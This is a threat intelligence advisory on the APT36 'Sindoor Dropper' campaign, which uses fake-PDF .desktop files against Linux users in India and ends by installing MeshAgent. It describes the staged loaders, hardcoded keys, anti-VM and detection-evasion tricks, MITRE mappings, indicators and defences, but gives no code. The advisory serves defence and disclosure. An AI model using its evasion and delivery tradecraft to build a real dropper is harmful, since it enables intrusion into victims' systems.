The Sindoor Dropper is a new phishing campaign attributed to APT36 (Transparent Tribe, Mythic Leopard, G0134), targeting Indian entities via spear-phishing emails. What makes this campaign stand out is its focus on Linux systems, using weaponized .desktop files that mimic PDF icons to trick users into executing them. The final payload is MeshAgent, a legitimate remote administration tool misused for full remote access.
Severity Level: High
Threat Details
- Attack Vector and Infection Chain
- The initial access vector involves spear-phishing emails carrying malicious .desktop files disguised as PDF documents.
- Upon execution, the file opens a decoy PDF to distract the user while launching a background payload delivery mechanism.
- The .desktop file initiates a multi-stage execution chain, each stage delivering obfuscated and encrypted binaries, including:
- AES-encrypted and UPX-packed Go binaries
- Custom decryptors and downloaders
- Final payload: MeshAgent (abused for persistent remote access)
- Execution Chain:
- Stage 1: .desktop file executes and downloads an encrypted loader from Google Drive.
- Stage 2: Loader decrypts payload using hardcoded keys (e.g., NIC0fficialDB_Auth, WOrkiNgtoDesksSS8123).
- Stage 3: MeshAgent is decrypted and installed.
- Anti-Analysis Techniques:
- Obfuscation via Base64 + DES-CBC
- Removal of ELF magic bytes to bypass detection
- Anti-VM checks (e.g., MAC address filtering, uptime check, OS vendor checks)
- Campaign Scale:
- Infrastructure set up in mid-August 2025
- Targeting is geographically focused on India
MITRE ATT&CK
| Tactic | Technique | ID |
| Initial Access | Spearphishing Attachment | T1566.001 |
| Execution | User Execution | T1204.002 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Masquerading | T1036.008 | |
| Virtualization/Sandbox Evasion | T1497.001 | |
| Deobfuscate/Decode Files or Information | T1140 | |
| Software Packing (UPX) | T1027.002 | |
| Persistence | Remote Access Software | T1219 |
| Command and Control | Application Layer Protocol: WebSockets | T1071.001 |
| Dynamic Resolution | T1568.002 | |
| Discovery | System Information Discovery | T1082 |
| Virtualization/Sandbox Evasion | T1497 |
Recommendations
- Block attachments with .desktop extensions (especially those spoofed as .pdf)
- Strip or sandbox links pointing to public file hosts like drive[.]google[.]com
- Consider using AppArmor or SELinux to sandbox user execution contexts.
- Ensure all Linux systems are running latest kernel and security updates.
- Monitor outbound traffic attempting to connect to subdomains of *[.]ddns[.]net on port 443, especially using wss:// URLs indicative of MeshAgent communication.
- Monitor for execution of files named mayuw, shjdfhd, inter_ddns, or server2
- Block the IOCs at their respective controls
https://www.virustotal.com/gui/collection/ede4120c68dbbb2a2a36ef4cf26ba37a5ae72014c5465c39077c7034b7e64371/iocs
Source:
- https://www.nextron-systems.com/2025/08/29/sindoor-dropper-new-phishing-campaign/
Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn
No related posts found.